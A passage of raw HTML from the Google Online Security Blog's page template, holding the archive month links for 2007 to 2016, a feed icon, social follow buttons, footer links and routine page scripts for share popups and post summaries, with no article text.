class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2016/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2015/'> 2015 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2015/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2014/'> 2014 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2014/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2013/'> 2013 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2013/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2012/'> 2012 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2012/01/'> Jan </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2011/'> 2011 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2011/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2010/'> 2010 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/04/'> Apr </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2010/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2009/'> 2009 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2009/03/'> Mar </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2008/'> 2008 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/12/'> Dec </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/08/'> Aug </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/05/'> May </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2008/02/'> Feb </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class='intervalToggle'> <span class='new-toggle' href='javascript:void(0)'> <i class='material-icons arrow'>  </i> </span> <a class='toggle' href='javascript:void(0)' style='display: none'> <span class='zippy'> <i class='material-icons'>  </i>   </span> </a> <a class='post-count-link' href='https://security.googleblog.com/2007/'> 2007 </a> </div> <div class='items'> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/11/'> Nov </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/10/'> Oct </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/09/'> Sep </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/07/'> Jul </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/06/'> Jun </a> </div> <div class='items'> </div> </li> </ul> <ul class='hierarchy'> <li class='archivedate collapsed'> <div class=''> <a class='post-count-link' href='https://security.googleblog.com/2007/05/'> May </a> </div> <div class='items'> </div> </li> </ul> </div> </li> </ul> </div> </div> <div class='clear'></div> </div> </div><div class='widget HTML' data-version='1' id='HTML6'> <div class='widget-content'> <a href="https://googleonlinesecurity.blogspot.com/atom.xml"> <img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADAAAAAwCAYAAABXAvmHAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAihJREFUeNrsWa9Pw0AU7viRMDFRBAkzJDMIBIhJJhCzk7NILIqMv4AEhdz+BCY3OYssAlGBoAJREpZwAlHEBO8lr8nSvNeVbu1dyX3JlzTrXfa+u/e9d7c5joWFhYVO1Fa8PwH2gK6m+BRwAvSlAdsrgr8E1jUuMH73GTAEzrkBWymTewZlihhLmgDXIAFuHgGVQOUF7OSYM1p6PgTuA1vAZlUEvAnPdapcMY0VICECekQ0XRfYrqoHsAGNgXfAoMomRiFDEhOZkkL3S88hMaB2LwXp0bj+ps2edpToZpjfoIDQtBeU+xjoDzP2G/gCPKZ5f8WsCAFJoJgOCcFdWSTeL9YQMSvTA1h9BkI5jaiXhLpSCL/8mVZY0UpyJ9ZdOkniu1dmJ96BpzQu9w6s28gcOq9j6pwLdR8/36NK5CQKwJSMrb2MhhSglBpt4UjsrdsnNu0B3J0HCozbCc4TjyY2srEgos/4RQljCzNxl4ireQD8FOq+T+W0mTB2g7njhlR+Sy2jsXFvU658U8YTbeaGpdIu7mWkEAq5ZtIjIhFZdtfX7QHckSvB2B6zC3VdAkZk0kAQwaXTk/CzTXK3wjIExCs6ZJpTnE4uY1KV+KzFzA3KTiFPENHJkOPcsfpLhwe4btoSuvUqAR+6TOxlCE6ZfKUsJLgsqGW8OpqAGx2X+sLxrwUog+JUeQRMDBIwyXOcnlPtPnL0/UsT/8LnOxYWFhZG4leAAQAAQHEaYuzHbAAAAABJRU5ErkJggg==" class="sidebar-icon" /> <h2>Feed</h2> </a> </div> <div class='clear'></div> </div></div> <div class='section' id='sidebar-bottom'><div class='widget HTML' data-version='1' id='HTML5'> <div class='widget-content'> <div class='followgooglewrapper'> <script src="https://apis.google.com/js/plusone.js"></script> <div class="g-ytsubscribe" data-channel="Google" data-layout="full"></div> </div> <div class="share followgooglewrapper"> <button data-href="https://twitter.com/intent/follow?original_referer=http://googleonlinesecurity.blogspot.in/&screen_name=google" onclick='sharingPopup(this);' id='twitter-share'><span class="twitter-follow">Follow @google</span></button> <script> function sharingPopup (button) { var url = button.getAttribute("data-href"); window.open( url,'popUpWindow','height=500,width=500,left=10,top=10,resizable=yes,scrollbars=yes,toolbar=yes,menubar=no,location=no,directories=no,status=yes'); } </script> </div> <div class="fb-follow-button"> <a href="https://www.facebook.com/google" target="_blank"><img class="fb-follow" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmruMUNSjAUsU-iCQjxgiqufl2u1wHJfiVTn3wuiIZAK1VUSRsexREPAOLV0N4-4VVtaYbZL18UsVh5CUlUJWH5UurFiQKMkHlNnj3YYw-2UiYtbNbvBE7VsAhdtw9rwNuOc-riC1exNkp/s1600/facebook-logo.png" />Follow</a> </div> </div> <div class='clear'></div> </div><div class='widget HTML' data-version='1' id='HTML1'> <div class='widget-content'> Give us feedback in our <a href="https://support.google.com/bin/static.py?hl=en&page=portal_groups.cs">Product Forums</a>. </div> <div class='clear'></div> </div></div> </div> </div> <div style='clear:both;'></div> </div>  <div class='google-footer-outer loading'> <div id='google-footer'> <a href='//www.google.com/'> <img class='google-logo-dark' height='36' src='data:image/png;base64,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' style='margin-top: -16px;' width='92'/> </a> <ul> <li> <a href='//www.google.com/'> Google </a> </li> <li> <a href='//www.google.com/policies/privacy/'> Privacy </a> </li> <li> <a href='//www.google.com/policies/terms/'> Terms </a> </li> </ul> </div> </div> <script type='text/javascript'> //<![CDATA[ // Social sharing popups. var postEl = document.getElementsByClassName('social-wrapper'); var postCount = postEl.length; for(i=0; i<postCount;i++){ postEl[i].addEventListener("click", function(event){ var postUrl = this.getAttribute("data-href"); window.open( postUrl,'popUpWindow','height=500,width=500,left=10,top=10,resizable=yes,scrollbars=yes,toolbar=yes,menubar=no,location=no,directories=no,status=yes'); });} //]]> </script> <script type='text/javascript'> //<![CDATA[ var BreakpointHandler = function() { this.initted = false; this.isHomePage = false; this.isMobile = false; }; BreakpointHandler.prototype.finalizeSummary = function(summaryHtml, lastNode) { // Use $.trim for IE8 compatibility summaryHtml = $.trim(summaryHtml).replace(/(<br>|\s)+$/,''); if (lastNode.nodeType == 3) { var lastChar = summaryHtml.slice(-1); if (!lastChar.match(/[.”"?]/)) { if (!lastChar.match(/[A-Za-z]/)) { summaryHtml = summaryHtml.slice(0, -1); } summaryHtml += ' ...'; } } else if (lastNode.nodeType == 1 && (lastNode.nodeName == 'I' || lastNode.nodeName == 'A')) { summaryHtml += ' ...'; } return summaryHtml; }; BreakpointHandler.prototype.generateSummaryFromContent = function(content, numWords) { var seenWords = 0; var summaryHtml = ''; for (var i=0; i < content.childNodes.length; i++) { var node = content.childNodes[i]; var nodeText; if (node.nodeType == 1) { if (node.hasAttribute('data-about-pullquote')) { continue; } nodeText = node.textContent; if (nodeText === undefined) { // innerText for IE8 